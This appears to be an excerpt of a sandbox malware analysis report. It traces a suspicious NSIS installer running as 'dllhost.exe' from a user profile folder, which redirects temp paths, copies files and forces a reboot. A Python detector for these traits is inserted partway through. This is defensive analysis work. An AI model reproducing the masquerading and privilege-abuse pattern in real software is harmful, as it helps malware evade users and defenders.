3893->3896 3893->3917 3897 40140b 2 API calls 3894->3897 3899 403723 3896->3899 3900 40371c 3896->3900 3897->3878 3898 40368f 4020 40624c lstrcpynW 3898->4020 3902 4057fc 2 API calls 3899->3902 3901 40577f 4 API calls 3900->3901 3904 403721 3901->3904 3905 403728 SetCurrentDirectoryW 3902->3905 3904->3905 3907 403743 3905->3907 3908 403738 3905->3908 3962 40395a 3906->3962 4029 40624c lstrcpynW 3907->4029 4028 40624c lstrcpynW 3908->4028 3911 40626e 18 API calls 3912 403782 DeleteFileW 3911->3912 3913 40378f CopyFileW 3912->3913 3919 403751 3912->3919 3913->3919 3914 4037d8 3915 406012 37 API calls 3914->3915 3915->3917 3916 406012 37 API calls 3916->3919 4021 403880 3917->4021 3918 40626e 18 API calls 3918->3919 3919->3911 3919->3914 3919->3916 3919->3918 3920 405831 2 API calls 3919->3920 3921 4037c3 CloseHandle 3919->3921 3920->3919 3921->3919 3922->3846 3923->3848 3925 4064e0 5 API calls 3924->3925 3927 403318 3925->3927 3926 403322 3926->3854 3927->3926 3928 405b1d 3 API calls 3927->3928 3929 40332a 3928->3929 3930 4057fc 2 API calls 3929->3930 3931 403330 3930->3931 3932 405d6d 2 API calls 3931->3932 3933 40333b 3932->3933 3933->3854 4030 405d3e GetFileAttributesW CreateFileW 3934->4030 3936 402f01 3955 402f11 3936->3955 4031 40624c lstrcpynW 3936->4031 3938 402f27 3939 405b69 2 API calls 3938->3939 3940 402f2d 3939->3940 4032 40624c lstrcpynW 3940->4032 3942 402f38 GetFileSize 3943 403034 3942->3943 3961 402f4f 3942->3961 4033 402e5d 3943->4033 3945 40303d 3947 40306d GlobalAlloc 3945->3947 3945->3955 4045 4032f5 SetFilePointer 3945->4045 3946 4032df ReadFile 3946->3961 4044 4032f5 SetFilePointer 3947->4044 3949 4030a0 3952 402e5d 6 API calls 3949->3952 3951 403088 3954 4030fa 36 API calls 3951->3954 3952->3955 3953 403056 3956 4032df ReadFile 3953->3956 3959 403094 3954->3959 3955->3861 3957 403061 3956->3957 3957->3947 3957->3955 3958 402e5d 6 API calls 3958->3961 3959->3955 3959->3959 3960 4030d1 SetFilePointer 3959->3960 3960->3955 3961->3943 3961->3946 
3961->3949 3961->3955 3961->3958 3963 406626 5 API calls 3962->3963 3964 40396e 3963->3964 3965 403974 3964->3965 3966 403986 3964->3966 4054 406193 wsprintfW 3965->4054 3967 40611a 3 API calls 3966->3967 3968 4039b6 3967->3968 3970 4039d5 lstrcatW 3968->3970 3972 40611a 3 API calls 3968->3972 3971 403984 3970->3971 4046 403c30 3971->4046 3972->3970 3975 405c25 18 API calls 3978 403a07 3975->3978 3976 403a9b 3977 405c25 18 API calls 3976->3977 3979 403aa1 3977->3979 3978->3976 3980 40611a 3 API calls 3978->3980 3982 403ab1 LoadImageW 3979->3982 3983 40626e 18 API calls 3979->3983 3981 403a39 3980->3981 3981->3976 3986 403a5a lstrlenW 3981->3986 3989 405b4a CharNextW 3981->3989 3984 403b57 3982->3984 3985 403ad8 RegisterClassW 3982->3985 3983->3982 3988 40140b 2 API calls 3984->3988 3987 403b0e SystemParametersInfoW CreateWindowExW 3985->3987 4017 403b61 3985->4017 3990 403a68 lstrcmpiW 3986->3990 3991 403a8e 3986->3991 3987->3984 3992 403b5d 3988->3992 3993 403a57 3989->3993 3990->3991 3994 403a78 GetFileAttributesW 3990->3994 3995 405b1d 3 API calls 3991->3995 3997 403c30 19 API calls 3992->3997 3992->4017 3993->3986 3996 403a84 3994->3996 3998 403a94 3995->3998 3996->3991 3999 405b69 2 API calls 3996->3999 4000 403b6e 3997->4000 4055 40624c lstrcpynW 3998->4055 3999->3991 4002 403b7a ShowWindow 4000->4002 4003 403bfd 4000->4003 4005 4065b6 3 API calls 4002->4005 4004 405383 5 API calls 4003->4004 4007 403c03 4004->4007 4006 403b92 4005->4006 4008 403ba0 GetClassInfoW 4006->4008 4011 4065b6 3 API calls 4006->4011 4009 403c07 4007->4009 4010 403c1f 4007->4010 4013 403bb4 GetClassInfoW RegisterClassW 4008->4013 4014 403bca DialogBoxParamW 4008->4014 4016 40140b 2 API calls 4009->4016 4009->4017 4012 40140b 2 API calls 4010->4012 4011->4008 4012->4017 4013->4014 4015 40140b 2 API calls 4014->4015 4015->4017 4016->4017 4017->3917 4018->3867 4019->3898 4020->3906 4022 403898 4021->4022 4023 40388a CloseHandle 4021->4023 4057 4038c5 4022->4057 4023->4022 4026 40595a 68 
API calls 4027 4036b3 OleUninitialize 4026->4027 4027->3874 4027->3875 4028->3907 4029->3919 4030->3936 4031->3938 4032->3942 4034 402e66 4033->4034 4035 402e7e 4033->4035 4036 402e76 4034->4036 4037 402e6f DestroyWindow 4034->4037 4038 402e86 4035->4038 4039 402e8e GetTickCount 4035->4039 4036->3945 4037->4036 4040 406662 2 API calls 4038->4040 4041 402e9c CreateDialogParamW ShowWindow 4039->4041 4042 402ebf 4039->4042 4043 402e8c 4040->4043 4041->4042 4042->3945 4043->3945 4044->3951 4045->3953 4047 403c44 4046->4047 4056 406193 wsprintfW 4047->4056 4049 403cb5 4050 403ce9 19 API calls 4049->4050 4052 403cba 4050->4052 4051 4039e5 4051->3975 4052->4051 4053 40626e 18 API calls 4052->4053 4053->4052 4054->3971 4055->3976 4056->4049 4058 4038d3 4057->4058 4059 4038d8 FreeLibrary GlobalFree 4058->4059 4060 40389d 4058->4060 4059->4059 4059->4060 4060->4026 4760 40483d 4761 40484c 4760->4761 4791 4049eb 4761->4791 4793 405892 GetDlgItemTextW 4761->4793 4763 404248 8 API calls 4765 4049ff 4763->4765 4764 40486c 4766 405c25 18 API calls 4764->4766 4767 404872 4766->4767 4794 40624c lstrcpynW 4767->4794 4769 404889 4770 406626 5 API calls 4769->4770 4775 404890 4770->4775 4771 4048d1 4795 40624c lstrcpynW 4771->4795 4773 4048d8 4774 405bc8 4 API calls 4773->4774 4776 4048de GetDiskFreeSpaceW 4774->4776 4775->4771 4779 405b69 2 API calls 4775->4779 4780 404929 4775->4780 4778 404902 MulDiv 4776->4778 4776->4780 4778->4780 4779->4775 4781 40499a 4780->4781 4782 404b35 21 API calls 4780->4782 4783 4049bd 4781->4783 4785 40140b 2 API calls 4781->4785 4784 404987 4782->4784 4796 404203 KiUserCallbackDispatcher 4783->4796 4786 40499c SetDlgItemTextW 4784->4786 4787 40498c 4784->4787 4785->4783 4786->4781 4789 404a6c 21 API calls 4787->4789 4789->4781 4790 4049d9 4790->4791 4792 404609 SendMessageW 4790->4792 4791->4763 4792->4791 4793->4764 4794->4769 4795->4773 4796->4790

                                                                              Control-flow Graph of the function at 40333d (the interactive graph colours nodes Executed / Not Executed; the text export below carries only the numbered basic-block ranges, the APIs they call, and the block-to-block edges)
                                                                              control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 60->48 60->61 61->48 72 40356f 62->72 64->72 74 4036aa 65->74 77 403668-403672 66->77 78 40361c-403651 66->78 72->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 
LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 95 403666 90->95 91->90 91->95 95->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->65 102->103 103->58 106 403717-40371a 103->106 104->80 110 403723 call 4057fc 106->110 111 40371c-403721 call 40577f 106->111 116 403728-403736 SetCurrentDirectoryW 110->116 111->116 118 403743-40376c call 40624c 116->118 119 403738-40373e call 40624c 116->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 00403360
                                                                              • GetVersion.KERNEL32 ref: 00403366
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                              • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                              • CharNextW.USER32(00000000), ref: 00403448
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403582
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004035B3
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                                              • DeleteFileW.KERNEL32(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                              • ExitProcess.KERNEL32 ref: 004036D4
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                              • CopyFileW.KERNEL32 ref: 00403797
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004037C4
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                              • ExitProcess.KERNEL32 ref: 0040387A
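The API list above is the stub's startup path as the sandbox recorded it: it resolves its own image (GetModuleHandleW with "C:\Users\user\AppData\Roaming\dllhost.exe", a system-binary name running from a user-writable profile directory), appends "Low" to the temp path and sets TEMP and TMP from that buffer, and finishes with LookupPrivilegeValueW(SeShutdownPrivilege), AdjustTokenPrivileges and ExitWindowsEx(00000002, 80040002), where flag 2 is EWX_REBOOT and the top bit of the reason code marks the shutdown as planned. As an added example that is not part of the Joe Sandbox report, the Python below parses lines in the report's `• Name.Module(args), ref: addr` format and applies those three checks to the trace, decoding the ExitWindowsEx flag word. The sample input is copied from the list above; the system-binary list, the check logic and the comma-based argument splitter are my assumptions (no commas occur inside paths in this report), not a Joe Sandbox signature.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input: lines copied from the report's "APIs" list for the NSIS stub
# (process 0xB, the dllhost.exe copy under AppData\Roaming). Joe Sandbox prints
# one call per line as "• Name.Module(arg,arg,...), ref: ADDRESS"; some lines
# have no argument list, and nested "Part of subcall" lines have another shape.
SAMPLE_TRACE = r"""
• SetErrorMode.KERNELBASE ref: 00403360
• GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403582
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
  • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
• AdjustTokenPrivileges.ADVAPI32 ref: 00403832
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"  # API name and exporting module
    r"(?:\((?P<args>.*)\))?"                    # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"    # call-site address
)
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Assumption (mine, not a Joe Sandbox list): binaries that only live under the
# system directories. explorer.exe is left out because it sits in C:\Windows.
SYSTEM_BINARIES = {"dllhost.exe", "svchost.exe", "rundll32.exe", "conhost.exe",
                   "csrss.exe", "lsass.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Win32 constants: ExitWindowsEx uFlags bits and the "planned" bit of dwReason.
EWX_FLAGS = {0x01: "EWX_SHUTDOWN", 0x02: "EWX_REBOOT", 0x04: "EWX_FORCE",
             0x08: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
SHTDN_REASON_FLAG_PLANNED = 0x80000000


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str


@dataclass
class Finding:
    kind: str
    detail: str
    ref: str


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None  # blank line or a nested "Part of subcall" line
    raw = m.group("args") or ""
    # Comma-separated; quoted paths carry a trailing space in the report.
    args = [a.strip().strip('"') for a in raw.split(",")] if raw else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref").upper())


def parse_trace(text: str) -> List[ApiCall]:
    return [c for c in map(parse_line, text.splitlines()) if c is not None]


def decode_ewx(flags: int) -> List[str]:
    names = [name for bit, name in EWX_FLAGS.items() if flags & bit]
    return names or ["EWX_LOGOFF"]  # EWX_LOGOFF is 0, i.e. no bits set


def analyze(text: str) -> List[Finding]:
    findings: List[Finding] = []
    seen = set()  # the same path shows up in several calls; report it once

    def add(kind: str, detail: str, ref: str) -> None:
        if (kind, detail) not in seen:
            seen.add((kind, detail))
            findings.append(Finding(kind, detail, ref))

    for c in parse_trace(text):
        for arg in c.args:  # system-process name outside System32/SysWOW64
            if WIN_PATH_RE.match(arg):
                base = arg.rsplit("\\", 1)[-1].lower()
                if base in SYSTEM_BINARIES and not arg.lower().startswith(SYSTEM_DIRS):
                    add("masquerade", f"{base} outside a system directory: {arg}", c.ref)
        if (c.name == "SetEnvironmentVariableW" and len(c.args) >= 2
                and c.args[0].upper() in ("TEMP", "TMP")):
            add("env-redirect", f"{c.args[0]}={c.args[1]}", c.ref)
        if c.name == "LookupPrivilegeValueW":
            for arg in c.args:
                if arg.startswith("Se") and arg.endswith("Privilege"):
                    add("privilege", arg, c.ref)
        if c.name == "ExitWindowsEx" and len(c.args) >= 2:
            flags, reason = int(c.args[0], 16), int(c.args[1], 16)
            planned = bool(reason & SHTDN_REASON_FLAG_PLANNED)
            add("reboot", f"{'|'.join(decode_ewx(flags))} reason=0x{reason:08X} "
                          f"planned={planned}", c.ref)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_TRACE):
        print(f"[{f.kind:12}] ref={f.ref} {f.detail}")
```

Run against the sample it reports the dllhost.exe path once (keyed on the first call that shows it, GetModuleHandleW at 00403421), the two TEMP/TMP rewrites, SeShutdownPrivilege, and the reboot as EWX_REBOOT with a planned reason code. Feeding it the whole "APIs" list of another function in the report works the same way, since nested subcall lines are skipped rather than mis-parsed.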
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 2488574733-2881799354
                                                                              • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                              • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                                              Control-flow Graph
                                                                              control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 159 4054f5-4054f8 140->159 160 4054d9-4054f3 SendMessageW * 2 140->160 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 145 4055f5-4055ff 144->145 146 4055d9-4055df 144->146 150 405601-405607 145->150 151 405655-405659 145->151 148 4055e1-4055f0 ShowWindow * 2 call 404216 146->148 149 40561a-405623 call 404248 146->149 148->145 163 405628-40562c 149->163 155 405609-405615 call 4041ba 150->155 156 40562f-40563f ShowWindow 150->156 151->149 153 40565b-405661 151->153 153->149 161 405663-405676 SendMessageW 153->161 155->149 164 405641-40564a call 4052b0 156->164 165 40564f-405650 call 4041ba 156->165 166 405508-40551f call 4041e1 159->166 167 4054fa-405506 SendMessageW 159->167 160->159 168 405778-40577a 161->168 169 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 161->169 164->165 165->151 178 405521-405535 ShowWindow 166->178 179 405555-405576 GetDlgItem SendMessageW 166->179 167->166 168->163 176 4056a9-4056b9 GetWindowRect 169->176 177 4056bc-4056d1 TrackPopupMenu 169->177 176->177 177->168 180 4056d7-4056ee 177->180 181 405544 178->181 182 405537-405542 ShowWindow 178->182 179->168 183 40557c-405594 SendMessageW * 2 179->183 184 4056f3-40570e SendMessageW 180->184 185 40554a-405550 call 404216 181->185 182->185 183->168 184->184 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                              • GetClientRect.USER32(?,?,00000004), ref: 00405499
                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405528
                                                                              • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                                                              • ShowWindow.USER32(00000000), ref: 004055E8
                                                                              • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                              • ShowWindow.USER32(00000008), ref: 00405637
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                              • CreatePopupMenu.USER32 ref: 0040567C
                                                                              • AppendMenuW.USER32 ref: 00405690
                                                                              • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                              • OpenClipboard.USER32(00000000), ref: 00405711
                                                                              • EmptyClipboard.USER32 ref: 00405717
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
                                                                              • CloseClipboard.USER32 ref: 00405772
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.442133033.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 0000000B.00000002.442128287.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442138820.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442142860.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 0000000B.00000002.442182123.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: ,UZ${$6B
                                                                              • API String ID: 590372296-1676891917
                                                                              • Opcode ID: 603f1e5836f016c9ef8918a926ca3e4a3ff6a637239844c800b68a1693d992f1
                                                                              • Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
                                                                              • Opcode Fuzzy Hash: 603f1e5836f016c9ef8918a926ca3e4a3ff6a637239844c800b68a1693d992f1
                                                                              • Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68
                                                                              Control-flow Graph
